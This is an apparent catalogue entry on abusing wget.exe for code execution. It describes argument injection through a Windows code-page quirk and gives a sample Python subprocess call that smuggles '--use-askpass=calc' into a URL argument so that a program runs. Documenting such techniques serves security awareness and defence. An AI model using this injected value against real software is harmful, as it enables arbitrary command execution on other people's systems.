.. /wget.exe
Star

Code Execution

 

Status: Other

Vendors:

Code Execution

  1. You are able to inject --use-askpass to execute arbitrary commands

    subprocess.run(['wget.exe', 'http://whatever/path" "--use-askpass=calc'])
    Use case
    If certain parts of the argument(s) are controllable, the attacker can inject additional arguments.
    Code Pages
    125x, 874

Acknowledgements: